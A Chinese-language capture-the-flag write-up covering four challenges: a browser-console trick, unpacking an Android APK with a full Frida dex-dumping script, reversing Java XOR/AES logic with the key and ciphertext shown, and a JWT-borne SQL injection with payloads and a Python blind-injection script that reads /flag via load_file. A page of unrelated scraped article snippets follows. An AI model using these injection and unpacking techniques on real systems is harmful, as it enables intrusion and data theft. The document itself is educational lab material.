签到题

思路

浏览器F12,调取ajax,输入队伍token,获取flag

过程

(1)浏览器进入F12查看js,看到game_manage.js这个js,看名字像是控制游戏的
在这里插入图片描述
(2)进入js,通过搜索“move”和“ajax”等关键字,以及if (f.value == 1024)条件,看到如下代码,是给后端发请求并弹窗
在这里插入图片描述
(3)复制该段代码到console,执行,浏览器弹窗,输入战队token,成功获取flag
在这里插入图片描述
在这里插入图片描述

vulcrack

思路

脱壳APK获取flag

过程

Step 1: 下载apk文件,在frida中使用自己编写的脚本进行脱壳
Step 2: 在jadx中打开脱壳后拿到的dex文件
在这里插入图片描述
Step 3:在jadx中观察源码发现,有个名为Flag的类,进入查看源码
在这里插入图片描述
Step 4:执行flag中的calcFlagFirstStep()和calcFlagSecondStep()
在这里插入图片描述
Step 5:把两个函数的运行结果拼起来,拿到flag并提交
附上frida利用脚本

'use strict';function LogPrint(log) {var theDate = new Date();var hour = theDate.getHours();var minute = theDate.getMinutes();var second = theDate.getSeconds();var mSecond = theDate.getMilliseconds()hour < 10 ? hour = "0" + hour : hour;minute < 10 ? minute = "0" + minute : minute;second < 10 ? second = "0" + second : second;mSecond < 10 ? mSecond = "00" + mSecond : mSecond < 100 ? mSecond = "0" + mSecond : mSecond;var time = hour + ":" + minute + ":" + second + ":" + mSecond;console.log("[" + time + "] " + log);
}function getAndroidVersion() {var version = 0;if (Java.available) {var versionStr = Java.androidVersion;version = versionStr.slice(0, 1);} else {LogPrint("Error: cannot get android version");}LogPrint("Android Version: " + version);return version;
}function getFunctionName() {var i = 0;var functionName = "";// Android 4: hook dvmDexFileOpenPartial// Android 5: hook OpenMemory// after Android 5: hook OpenCommonif (getAndroidVersion() > 4) { // android 5 and later versionvar artExports = Module.enumerateExportsSync("libart.so");for (i = 0; i < artExports.length; i++) {if (artExports[i].name.indexOf("OpenMemory") !== -1) {functionName = artExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;} else if (artExports[i].name.indexOf("OpenCommon") !== -1) {functionName = artExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}} else { //android 4var dvmExports = Module.enumerateExportsSync("libdvm.so");if (dvmExports.length !== 0) { // check libdvm.so firstfor (i = 0; i < dvmExports.length; i++) {if (dvmExports[i].name.indexOf("dexFileParse") !== -1) {functionName = dvmExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}} else { // if not load libdvm.so, check libart.sodvmExports = Module.enumerateExportsSync("libart.so");for (i = 0; i < dvmExports.length; i++) {if (dvmExports[i].name.indexOf("OpenMemory") !== -1) {functionName = dvmExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}}}return functionName;
}function getProcessName() {var processName = "";var fopenPtr = Module.findExportByName("libc.so", "fopen");var fopenFunc = new NativeFunction(fopenPtr, 'pointer', ['pointer', 'pointer']);var fgetsPtr = Module.findExportByName("libc.so", "fgets");var fgetsFunc = new NativeFunction(fgetsPtr, 'int', ['pointer', 'int', 'pointer']);var pathPtr = Memory.allocUtf8String("/proc/self/cmdline");var openFlagsPtr = Memory.allocUtf8String("r");var fp = fopenFunc(pathPtr, openFlagsPtr);if (fp.isNull() === false) {var buffData = Memory.alloc(128);var ret = fgetsFunc(buffData, 128, fp);if (ret !== 0) {processName = Memory.readCString(buffData);LogPrint("processName " + processName);}}return processName;
}function arraybuffer2hexstr(buffer) {var hexArr = Array.prototype.map.call(new Uint8Array(buffer),function (bit) {return ('00' + bit.toString(16)).slice(-2)});return hexArr.join(' ');
}function checkDexMagic(dataAddr) {var magicMatch = true;var magicFlagHex = [0x64, 0x65, 0x78, 0x0a, 0x30, 0x33, 0x35, 0x00];for (var i = 0; i < 8; i++) {if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {magicMatch = false;break;}}return magicMatch;
}function checkOdexMagic(dataAddr) {var magicMatch = true;var magicFlagHex = [0x64, 0x65, 0x79, 0x0a, 0x30, 0x33, 0x36, 0x00];for (var i = 0; i < 8; i++) {if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {magicMatch = false;break;}}return magicMatch;
}function dumpDex(moduleFuncName, processName) {if (moduleFuncName !== "") {var hookFunction;if (getAndroidVersion() > 4) { // android 5 and later versionhookFunction = Module.findExportByName("libart.so", moduleFuncName);} else { // android 4hookFunction = Module.findExportByName("libdvm.so", moduleFuncName); // check libdvm.so firstif (hookFunction == null) {hookFunction = Module.findExportByName("libart.so", moduleFuncName); //// if not load libdvm.so, check libart.so}}Interceptor.attach(hookFunction, {onEnter: function (args) {var begin = 0;var dexMagicMatch = false;var odexMagicMatch = false;dexMagicMatch = checkDexMagic(args[0]);if (dexMagicMatch === true) {begin = args[0];} else {odexMagicMatch = checkOdexMagic(args[0]);if (odexMagicMatch === true) {begin = args[0];}}if (begin === 0) {dexMagicMatch = checkDexMagic(args[1]);if (dexMagicMatch === true) {begin = args[1];} else {odexMagicMatch = checkOdexMagic(args[1]);if (odexMagicMatch === true) {begin = args[1];}}}if (dexMagicMatch === true) {LogPrint("magic : " + Memory.readUtf8String(begin));//console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));var address = parseInt(begin, 16) + 0x20;var dex_size = Memory.readInt(ptr(address));LogPrint("dex_size :" + dex_size);var dex_path = "/data/data/" + processName + "/" + dex_size + ".dex";var dex_file = new File(dex_path, "wb");dex_file.write(Memory.readByteArray(begin, dex_size));dex_file.flush();dex_file.close();LogPrint("dump dex success, saved path: " + dex_path + "\n");} else if (odexMagicMatch === true) {LogPrint("magic : " + Memory.readUtf8String(begin));//console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));var address = parseInt(begin, 16) + 0x0C;var odex_size = Memory.readInt(ptr(address));LogPrint("odex_size :" + odex_size);var odex_path = "/data/data/" + processName + "/" + odex_size + ".odex";var odex_file = new File(odex_path, "wb");odex_file.write(Memory.readByteArray(begin, odex_size));odex_file.flush();odex_file.close();LogPrint("dump odex success, saved path: " + odex_path + "\n");}},onLeave: function (retval) {}});} else {LogPrint("Error: cannot find correct module function.");}
}//start dump dex file
var moduleFucntionName = getFunctionName();
var processName = getProcessName();
if (moduleFucntionName !== "" && processName !== "") {dumpDex(moduleFucntionName, processName);
}

java

思路

反编译java源码,逆推获取flag

过程

Step 1: 通过jadx工具进行反编译出代码如下:
在这里插入图片描述
Step 2: 导出之后,再导入Android Studio,查看代码逻辑,改了少部分反编译错误代码后运行:
在这里插入图片描述
在这里插入图片描述
Step 3: 查看代码逻辑,发现是用户输入值后,通过补位、AES运算和位运算后,再进行base64编码,与值
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”相等,则用户的输入就是flag,因此下面进行逆运算。

Step 4:如上所说,要逆运算,首先先进行base64解码,代码如下:
public static byte[] decode(byte[] bArr){
return Base64.decode(bArr,Base64.NO_WRAP);
}

Step 5: 原来程序的位运算代码逻辑如下:
public byte[] a(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
System.out.println(“data.length”);
System.out.println(length);
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
return bArr;
}
由于该位运算(异或运算)可逆,可写出逆运算代码逻辑如下:
/**
*
* @param i = 22
* @param iArr = {214, 144, 233, 254, 204, 225, 61, 183, 22, 182, 43, 103, 20, 194, 40, 251, 44, 5, 43, 103, 154, 118, 42, 190, 4, 195, 43, 103, 170, 68, 19, 38, 73, 134, 43, 103, 153, 156, 66, 80, 244, 145, 80, 103, 239, 152, 122, 98, 50, 214};
*/
public byte[] a1(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
return bArr;
}

Step 6: 接下来进行AES逆运算,即AES解密,AES秘钥在源代码中存在:
/**
* @param bArr 密文,待解密
* @param bArr2 密钥:aes_check_key!@#
**/
public static byte[] aesDecrypt(byte[] bArr, byte[] bArr2) {
try {
SecretKeySpec secretKeySpec = new SecretKeySpec(bArr2, “AES”);
Cipher instance = Cipher.getInstance(“AES/ECB/NoPadding”);
instance.init(Cipher.DECRYPT_MODE, secretKeySpec);
byte[] decrypt = instance.doFinal(bArr);
System.out.println(“AES解密:”+ Arrays.toString(decrypt));
return decrypt;
} catch (Exception e) {
e.printStackTrace();
return new byte[0];
}
}

Step 7: 结合以上三步:
(1)首先将
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”进行base64解码,调用我们Step4中写好的decode函数
(2)之后进行位运算的,调用我们Step5中写好的异或的逆运算函数:a1
(3)最后进行aes解密,调用我们Step6中写好的aesDecrypt函数
写出整个还原flag的函数代码为:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
}
(4)该test函数运行后,结果如下:
在这里插入图片描述
(5)观察到flag后有多余的字符,是由于原始运算的补位形成的,咱们就把最后多余的6位去掉,在test函数中加上补位运算的逆运算后代码如下:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
System.out.println(aesSrc.length);
byte[] target = new byte[aesSrc.length - 6];
System.arraycopy(aesSrc,0,target,0,target.length);
System.out.println(“最终字符串:”+new String(target));
}
(6)以上完整的test函数运算结果如下,获取flag:
在这里插入图片描述

js_on

思路

jwt中sql注入读文件获取flag

过程

Step 1:打开url:
http://xx.changame.ichunqiu.com/login.html,弱口令:admin/admin成功登录
在这里插入图片描述
Step 2:回到登录页,发现有个注册地方,可成功注册未注册过的账号,如:admin2/admin2
在这里插入图片描述
Step 3:登录刚刚自己注册的admin2账号,发现输出不一样,说x明后端肯定判断了当前账号是否为admin,如果不是,就输出hello ……等字样。当前地址为:http://xx.cloudgame2.ichunqiu.com/index.php
在这里插入图片描述
Step 4:浏览器F12查看cookie,看到有个token字段,且为JWT格式,说明该系统通过JWT来标识用户,且联想到页面上显示的key值为JWT的token。
在这里插入图片描述
Step 5:根据JWT知识,将token内容复制到https://jwt.io/#debugger网站进行base64解码如下,可看到payload字段的user值为admin2:
在这里插入图片描述
Step 6:Step 3中提到
http://xxx.cloudgame2.ichunqiu.com/index.php页面对当前用户进行了判断,从而决定页面输出内容,因此猜测user字段存在sql注入漏洞,进行尝试。
https://jwt.io/#debugger 右下角填入secret(即页面上回显的key值),此处user参数肯定为字符型,开始构造攻击语句,左边获取对应JWT。
Step7:(1)构造攻击payload:
{
“user”: “admin’//and//1=2#”,
“news”: “key:xRtYMDqyCCxYxi9a@LgcGpnmM2X8i&6"
}
获取左边JWT:
在这里插入图片描述
burpsuite发包,响应如下:
在这里插入图片描述
(2)构造攻击payload:
{
“user”: “admin’//and//1=1#”,
“news”: "key:xRt
YMDqyCCxYxi9a@LgcGpnmM2X8i&6”
}
获取左边JWT:
在这里插入图片描述
burpsuite发包,响应如下:
在这里插入图片描述

(3)根据两个不通响应,能够确认此处存在sql注入漏洞

Step8:构造攻击代码:“user”: "aa’-- “和"user”: "'select"获取对应JWT,发送请求包发现回包存在“Get Out Hacker!!!”字样,说明后端有做攻击检测。

在这里插入图片描述
Step9:结合之前回包的“

这里是你的信息:???Why there is No Message for you?

”,通过substr+loadfile函数,获取/flag文件中内容,构造python利用脚本如下:

coding:utf-8

import jwt
import requestsurl = 'http://xxx.changame.ichunqiu.com/'
data = ''
dict = '0123456789abcdeflg-{}'
for i in range(1, 60):for j in dict:encoded_jwt = jwt.encode({"user":"admin'/**/and/**/load_file('/flag')/**/regexp/**/'^" + data + j + "'#","news":"key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"},'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6',headers={"alg":"HS256","typ":"jwt"})cookies = {'UM_distinctid':'','Hm_lvt_2d0601bd28de7d49818249cf35d95943':'','__jsluid_h':'','token':encoded_jwt}try:res = requests.get(url=url,cookies=cookies,timeout=3)if 'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6' in res.content:data += jprint(str(data))breakexcept Exception as e:print(str(e))

在这里插入图片描述

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. RT-Thread 移植是stm32F429 pwm例程

    估计来到这里的小伙伴都应该和我差不多,刚开始把rtt移植到stm32上,在用env配置的时候多少会遇到一些问题,我也是不会自己瞎搞搞出来了(哈哈哈,没办法,太菜了),所以希望你们更轻松点。 好了我们进入正题。 在开始之前需要 : 1、env配置好 env配置教程 2、示例代码下载…...

    2024/4/19 13:10:20
  2. 组队竞赛:牛牛举办了一次编程比赛,参加比赛的有3*n个选手,每个选手都有一个水平值a_i.现在要将这些选手进行组队,一共组成n个队伍,即每个队伍3人.牛牛发现队伍的水平值等于该队伍队员中第二高水平值。

    例如: 一个队伍三个队员的水平值分别是3,3,3.那么队伍的水平值是3 一个队伍三个队员的水平值分别是3,2,3.那么队伍的水平值是3 一个队伍三个队员的水平值分别是1,5,2.那么队伍的水平值是2 为了让比赛更有看点,牛牛想安排队伍使所有队伍的水平值总和最大。 如样例所示: 如果牛牛…...

    2024/5/4 15:05:42
  3. 如何检查WEB站点SQL注入漏洞

    Submit:x0r revise:x0r date:20080227 source document:internet 为了确保将自己的Web站点和Web应用程序达到最高效安全,免受SQL注入式攻击后所带来的麻烦。本文讲述了三部分关于防范SQL注入式攻击的安全检查 1.通过彻底审核针对Web站点和Web应用程序的SQL注入式攻击和其它…...

    2024/4/17 19:25:35
  4. Unity WebGL环境搭建、开发、使用

    前言Unity WebGL是unity公司替换Unity Web Player的新产品,优点是不需要安装插件,用支持HTML5的浏览器打开网页即可使用。本文描述Unity WebGL的相关开发工具及JS开发技术要点。 缺点是目前还不支持移动设备!安装设置下载安装Unity Editor注册一个UnityID,登录后就可以开始…...

    2024/5/5 0:14:54
  5. win10系统word2016打开出现运行时错误 “429 ActiveX部件不能创建对象” 的解决方法!

    手工注册此文件: 点击“开始”→“运行”在弹出的输入框中键入以下命令: regsvr32 "C:\Program Files\Common Files\Microsoft Shared\DAO\dao360.dll" regsvr32 "C:\Program Files\Common Files\Microsoft Shared\DAO\dao350.dll" 然后按回车键,注意必…...

    2024/4/30 19:59:45
  6. jmeter断言-BeanShell断言

    1.什么是BeanShell断言?BeanShell断言可以使用beanshell脚本来执行断言检查,可以用于更复杂的个性化需求,使用更灵活,功能更强大,但是要能够熟练使用beanshell脚本。在这里除了可以使用beanshell的内置变量外,主要通过Failure和FailureMessage来设置断言结果。Failure = …...

    2024/5/4 17:49:33
  7. BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析

    BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析 略读代码: 转换思路: 尝试宽字节注入: 理解宽字节: 编写pocsuite插件: requests不进行urldecode: 验证:总结: 参考:略读代码:开头包含了文件require_once(dirn…...

    2024/4/18 6:47:07
  8. 听说API大赛有神奇作品出现?

    原文链接听说API大赛有神奇作品出现?发布时间:2017-05-08 10:16:21415人关注3人参与API大赛截止到今天已有3个月了,抱着好奇心,去看了一下活动网站,发现了大波的作品晒在上面,但是作品名字都是稀奇古怪的。认真看了一下简短的介绍,也没有看太明白,就找了两个参赛团队了…...

    2024/4/17 19:25:29
  9. 《WebGL编程指南》---从示例代码中学习WebGL之初识【2】

    在上一节中,我们知道了如何简单的WebGL程序及其相关函数的使用。在这一节中,我们学习如何用简单的着色器画一个点。我们先来简单说说这里用到的两个着色器。顶点着色器(Vertex shader)顶点着色器实际上就是一段小程序,它描述了应用程序传进来的顶点的一些特性,比如位置、颜…...

    2024/4/19 20:49:41
  10. c3p0xml配置详解

    <?xml version="1.0" encoding="UTF-8"?> <c3p0-config> <default-config> <!--当连接池中的连接耗尽的时候c3p0一次同时获取的连接数。Default: 3 --> <property name="acquireIncrement">3</property>…...

    2024/5/4 22:47:53
  11. BeanShell 学习指南

    下面是 BeanShell 的入门教程,请点击查看详情!欢迎大家提出宝贵意见!快速开始什么是BeanShell?BeanShell入门指南BeanShell快速开始BeanShell的GUI(图形用户界面)BeanShell中的Java指令和表达式BeanShell实用命令BeanShell脚本方法BeanShell中实现接口BeanShell的脚本对象从…...

    2024/3/31 18:14:23
  12. STM32F429--固件库点亮LED灯

    文件说明bsp_led.c负责LED的初始化配置 bsp_led.h负责外设LED函数的声明,以及宏定义,提高移植性 main.c实现功能点亮LED代码 1.mai.c #include "stm32f4xx.h" #include "bsp_led.h"int main(void) {while(1){LED_GPIO_Config();} }2.bsp_led.c #include …...

    2024/4/19 12:10:15
  13. webGL入门-四阶贝塞尔曲线绘制

    随着现代浏览器端技术不短进步,web也逐渐支持了3D绘图技术。时至今日webGL这项技术已经在去年迎来了2.0版本。现如今数据可视化技术也日益繁杂起来,越来越多的数据可视化也逐渐从平面图表增加了许多新的3D类型图表,亦或者借助webGL的力量让数据渲染能力得到大幅度提升。本人…...

    2024/4/17 19:25:17
  14. To-King战地日记(之二)

    其实我不想告诉大家,在我这篇战地日记之前,我们战队的马姐还有一篇ToKing战地日记,原因是这厮的战地日记让我觉得我头上顶着一个山大的鸭梨。但我还是告诉大家了,为什么呢?因为那篇战地日记介绍了我们战队的每一个成员?因为那是我们战队的第一篇战地日记?还是因为……?…...

    2024/4/17 19:25:17
  15. dedecms好友描述修改和会员中心收藏删除均存在sql注入漏洞

    发布时间:2013-04-12 关键词:dedecms 织梦 sql注入 近日dedecms曝出两个漏洞: 1、好友描述修改处参数未过滤导致SQL注入漏洞 2、会员中心收藏删除功能存在SQL注入漏洞。 好友描述修改SQL注入漏洞存在于/member/ajax_membergroup.php文件中: //编辑描述 elseif($action =…...

    2024/4/19 8:07:39
  16. jmeter的BeanShell用法汇总(部分摘抄至网络)

    说明:本文部分资料摘抄至来源: http://www.cnblogs.com/puresoul/p/4915350.html来源: http://www.cnblogs.com/puresoul/p/4949889.html来源: http://blog.csdn.net/silencemylove/article/details/51373873一、什么是Bean ShellBeanShell是一种完全符合Java语法规范的脚本…...

    2024/4/20 11:44:13
  17. STM32F429点亮led实验

    一.调用的函数:在stm32f429中点亮led通过控制引脚的高低电平来实现,在f429的hal库中控制引脚高低电平的函数: void HAL_GPIO_WritePin(GPIO_TypeDef GPIOx, uint16_t GPIO_Pin, GPIO_PinState PinState);* 使用样例(引脚PB1输出低电平): HAL_GPIO_WritePin(GPIOB,GPIO_P…...

    2024/4/11 20:57:26
  18. spring 配置连接池时 各个属性的介绍

    <!--当连接池中的连接耗尽的时候c3p0一次同时获取的连接数。Default: 3 --> <property name="acquireIncrement">3</property> <!--定义在从数据库获取新连接失败后重复尝试的次数。Default: 30 --> <property name="acquireRetryAt…...

    2024/4/25 9:02:11
  19. 系统架构设计之微服务(Microservice)

    看了这篇文章总体上会对微服务有个认识,如果不是分布式应用和采用云部署模式,微服务基本上是一个技术概念,如果不能得以实践,姑且听之。 首先来了解一些概念,以下内容来自:http://www.jdon.com/soa/microservice-architecture.html 什么是微服务架构?微服务是指开发一个…...

    2024/5/4 17:39:31
  20. WebGL的原生API不可能那么可爱

    本文简介 通过三种方法实现同一目标来展示WebGL原生API,并引导读者入门WebGL(伪)。 本文将分别使用Canvas 2D Context,Three.js,WebGL来绘制一个最简单的图形——一个6*6像素的点。 正文 当你第一次听说浏览器支持WebGL了,你可能欢呼雀跃,暗喜我大前端也有能操纵3D图形的…...

    2024/5/4 18:21:08

最新文章

  1. 【网站项目】木里风景文化管理平台

    &#x1f64a;作者简介&#xff1a;拥有多年开发工作经验&#xff0c;分享技术代码帮助学生学习&#xff0c;独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。&#x1f339;赠送计算机毕业设计600个选题excel文件&#xff0c;帮助大学选题。赠送开题报告模板&#xff…...

    2024/5/5 1:08:17
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. HiveSQL如何生成连续日期剖析

    HiveSQL如何生成连续日期剖析 情景假设&#xff1a; 有一结果表&#xff0c;表中有start_dt和end_dt两个字段&#xff0c;&#xff0c;想要根据开始和结束时间生成连续日期的多条数据&#xff0c;应该怎么做&#xff1f;直接上结果sql。&#xff08;为了便于演示和测试这里通过…...

    2024/5/3 0:10:24
  4. InternLM2-lesson2笔记

    书生浦语大模型趣味 Demo 视频连接&#xff1a;https://www.bilibili.com/video/BV1AH4y1H78d/?vd_source902e3124d4683c41b103f1d1322401fa 目录 书生浦语大模型趣味 Demo课程总览SIG项目Demo部署的一般流程存在的问题总结 课程总览 InternLM2-chat-1.8B部署八戒-chat-1.8B…...

    2024/5/4 4:32:44
  5. MySQL 8.0 支持对单个数据库设置只读!

    MySQL 8.0.22 支持对单个数据库设置只读&#xff0c;当一个实例中只需要迁移部分数据库时比较实用&#xff0c;避免数据库迁移过程中数据库及其对象被修改。 作者&#xff1a;李富强&#xff0c;爱可生 DBA 团队成员&#xff0c;熟悉 MySQL&#xff0c;TiDB&#xff0c;OceanBa…...

    2024/5/2 14:53:12
  6. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/4 23:54:56
  7. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/4 23:54:56
  8. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  9. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/4 23:55:17
  10. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  11. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  12. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  13. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/4 23:55:16
  14. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  15. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/4 18:20:48
  16. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  17. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/4 23:55:17
  18. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/4 23:55:06
  19. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  20. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/4 23:55:06
  21. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/4 2:59:34
  22. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/4 23:55:16
  23. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  24. 广州械字号面膜生产厂家OEM/ODM4项须知!

